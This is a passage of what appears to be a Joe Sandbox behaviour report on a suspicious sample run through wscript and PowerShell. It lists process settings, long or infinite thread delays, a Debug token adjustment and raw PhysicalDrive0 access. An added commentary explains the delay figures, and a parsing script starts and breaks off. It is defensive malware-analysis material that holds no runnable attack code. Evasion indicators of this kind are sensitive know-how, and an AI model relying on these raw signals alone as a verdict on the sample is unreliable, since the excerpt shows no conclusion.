              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599562
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599343
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599234
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598797
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4298
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599890s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599781s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599672s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599562s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599453s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599343s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599234s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599125s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -599015s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -598906s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -598797s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -598687s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -598577s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep time: -598468s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7648 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7648 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412 | Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599562
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599343
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599234
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598797
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 598468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: svchost.exe, 00000009.00000002.3747955096.0000027DA822B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3748521397.0000027DAD855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
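The delay values above read more easily once two non-malware figures are recognised. 922337203685477 is System.TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks divided by 10,000), which is how a .NET wait on an infinite timeout is logged; the TID lines carry exact multiples of it (x6, x15, x24), i.e. several such waits summed per thread. The run 600000, 599890, ..., 598468 is one 10-minute timeout re-armed fourteen times with its remaining time, not fifteen separate sleeps. The script below is an added example and not part of the Joe Sandbox report: it parses lines in the report's wording, labels each value against the report's own thresholds (3 minutes for the "long sleeps" signature, 30000 ms on the TID lines) and picks out such countdown runs. The label names and the step limit are my own choices.

```python
import re

# System.TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10_000 ticks per ms.
# A .NET wait on an infinite timeout is logged with this value; when the sandbox adds
# up several such waits for one thread the figure is an exact multiple of it.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

# Thresholds taken from the report itself: the "long sleeps" signature fires at
# 3 minutes and the per-thread sleep lines are compared against 30000 ms.
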